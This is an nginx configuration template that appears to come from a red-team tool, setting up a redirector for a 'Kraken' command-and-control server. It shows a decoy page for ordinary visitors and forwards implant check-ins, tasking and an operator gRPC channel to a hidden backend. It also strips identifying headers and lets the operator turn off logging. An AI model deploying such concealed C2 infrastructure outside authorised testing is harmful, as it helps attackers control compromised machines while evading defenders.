# Kraken Redirector - nginx configuration
# Generated by kraken-redirector. DO NOT EDIT manually.
# Profile: {{PROFILE}}
# Generated: {{GENERATED_AT}}

# Rate limiting zone
limit_req_zone $binary_remote_addr zone=kraken_limit:10m rate=10r/s;

server {
    listen 80;
    listen [::]:80;
    server_name {{SERVER_NAME}};

    # Redirect plain HTTP to HTTPS
    return 301 https://$host$request_uri;
}

server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    server_name {{SERVER_NAME}};

    # TLS configuration
    ssl_certificate     {{TLS_CERT_PATH}};
    ssl_certificate_key {{TLS_KEY_PATH}};
    ssl_protocols       TLSv1.2 TLSv1.3;
    ssl_ciphers         ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256;
    ssl_prefer_server_ciphers off;
    ssl_session_cache   shared:SSL:10m;
    ssl_session_timeout 1d;
    ssl_session_tickets off;

    # HSTS
    add_header Strict-Transport-Security "max-age=63072000" always;

    # Hide server identity
    server_tokens off;
    more_clear_headers Server;

    # Default: return decoy response for all unmatched traffic
    location / {
        # Serve a plausible decoy page - appears to be a generic web application
        add_header Content-Type "text/html; charset=utf-8";
        add_header Cache-Control "no-store";
        return 200 '<!DOCTYPE html><html><head><title>Service</title></head><body><p>Service Unavailable</p></body></html>';
    }

    # --- Kraken C2 matched URIs ---
    # Check-in endpoint (implant polling)
    location = {{CHECKIN_URI}} {
        # Only proxy requests that look like valid implant traffic
        # User-Agent check (optional, configure per deployment)
        # if ($http_user_agent !~ "Mozilla/5.0") { return 404; }

        limit_req zone=kraken_limit burst=20 nodelay;

        proxy_pass         https://{{BACKEND_HOST}}:{{BACKEND_PORT}};
        proxy_ssl_verify   {{PROXY_SSL_VERIFY}};
{{PROXY_SSL_CERTIFICATE_LINES}}
        proxy_set_header   Host              $host;
        proxy_set_header   X-Real-IP         $remote_addr;
        proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
        proxy_set_header   X-Forwarded-Proto $scheme;

        proxy_connect_timeout 10s;
        proxy_read_timeout    60s;
        proxy_send_timeout    60s;

        proxy_http_version 1.1;
        proxy_set_header   Connection "";

        # Strip any headers that reveal redirector presence
        proxy_hide_header  X-Powered-By;
        proxy_hide_header  Server;
    }

    # Task submission endpoint
    location = {{TASK_URI}} {
        limit_req zone=kraken_limit burst=20 nodelay;

        proxy_pass         https://{{BACKEND_HOST}}:{{BACKEND_PORT}};
        proxy_ssl_verify   {{PROXY_SSL_VERIFY}};
{{PROXY_SSL_CERTIFICATE_LINES}}
        proxy_set_header   Host              $host;
        proxy_set_header   X-Real-IP         $remote_addr;
        proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
        proxy_set_header   X-Forwarded-Proto $scheme;

        proxy_connect_timeout 10s;
        proxy_read_timeout    60s;
        proxy_send_timeout    60s;

        proxy_http_version 1.1;
        proxy_set_header   Connection "";

        proxy_hide_header  X-Powered-By;
        proxy_hide_header  Server;
    }

    # gRPC operator channel passthrough (HTTP/2)
    location /kraken.operator {
        grpc_pass          grpcs://{{BACKEND_HOST}}:{{GRPC_BACKEND_PORT}};
        grpc_ssl_verify    {{PROXY_SSL_VERIFY}};
{{GRPC_SSL_CERTIFICATE_LINES}}
        grpc_set_header    Host $host;

        # mTLS for operator channel
{{GRPC_MTLS_LINES}}
        grpc_read_timeout  600s;
        grpc_send_timeout  600s;
    }

    # Access logging (operator can toggle off for opsec)
    {{ACCESS_LOG_LINE}}
    error_log  /var/log/nginx/kraken-redirector-error.log warn;
}
